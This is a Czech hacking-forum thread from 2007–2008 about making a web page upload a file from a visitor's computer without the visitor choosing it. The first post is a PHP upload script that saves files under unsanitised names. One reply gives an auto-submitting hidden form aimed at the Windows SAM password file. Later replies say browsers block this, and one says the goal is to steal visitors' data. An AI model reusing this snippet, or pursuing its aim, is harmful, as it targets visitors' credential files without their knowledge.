PHP file upload

HackForum

PHP file upload#
Cau all. Potrebuju na server nahrat jeden soubor pomoci php ale nechci aby jsem ten soubor musel vybirat pomoci input tagu. Chci jenom z tohodle udelat script ktery nahraje na server soubor soubor.txt do slozky cmd bez vyberu toho souboru. Pls mohl by mi nekdo poradit? Diky :-)


<html>
<head>
<title>Upload souborů</title>
</head>
<body>
<form action="#" method="post" enctype="multipart/form-data">
<input type="file" name="fupload">
<input type="submit" value="Nahrát">
</form>
<?php
if (isset($_FILES['fupload']))
{

$slozka = "cmd";
$cil = $slozka . "/" .$_FILES['fupload']['name'];
$nazev_souboru = $_FILES['fupload']['tmp_name'];
$copy = move_uploaded_file($nazev_souboru, $cil)
or die ("Přenesený soubor nelze zkopírovat");
chmod ($cil, 0644);
if($copy == true){
echo "Success";

}else{
echo "Soubor nemohl být nahrán.\nPočet chyb: " . $_FILES['fupload']['error'];
}
}
?>
</body>
</html>
(odpovědět)
banan_rusher | 88.101.37.*18.3.2007 21:19
re: PHP file upload#
<form name="fakeform" ...>
<input type="file" name="fupload" value="C:\windows\repair\sam">
...
</form>

<script type="text/javascript">document.fakeform
.submit()</script>

viz.: CSRF:
[link]

----------
Harvie's blog: [link] g33k-shop: [link] fs: [link]
Registered GNU/LINUX user #468114 [link]

(odpovědět)
Harvie | E-mail | Website | ICQ 28378297819.3.2007 9:54
re: PHP file upload#
Hmm, ted na to koukam, to by asi nemelo jit takhle snadno... ;) ale zkus to...

----------
Harvie's blog: [link] g33k-shop: [link] fs: [link]
Registered GNU/LINUX user #468114 [link]

(odpovědět)
Harvie | E-mail | Website | ICQ 28378297819.3.2007 9:57
re: PHP file upload#
Pokud nenajdeš ňáký exploit na prohlížeči tak to nejde, to co napsal Harvie je blbost, to má každý prohlížeč ošetřené.
(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797619.3.2007 15:32
re: PHP file upload#
aha dik, ale s tim exploitem to bude asi tezky :D jinak asi nezna nekdo jiny zpusob jak nahrat soubor na web pomoci jineho jazyka?
(odpovědět)
bananpro | E-mail | Website | PGP | ICQ 22766000619.3.2007 17:38
re: PHP file upload#
Upřesni pojem "nahrát soubor na web".
Co FTP?
(odpovědět)
guguma | 195.113.79.10/10.0.10.*19.3.2007 19:20
re: PHP file upload#
Dotyčnému jde o to kterak pri pouhem nacteni webu nevedomky jeho tvurci odeslat veskera sva osobni data. Ostatne jak zde jiz nekdo naznacoval. Osobne bych s prohlizecem ktery by mu toto umoznil nechtel prijit do styku :D
(odpovědět)
Hxn | 88.100.95.*1.8.2008 5:56

Zpět
 
 
 

 
BBCode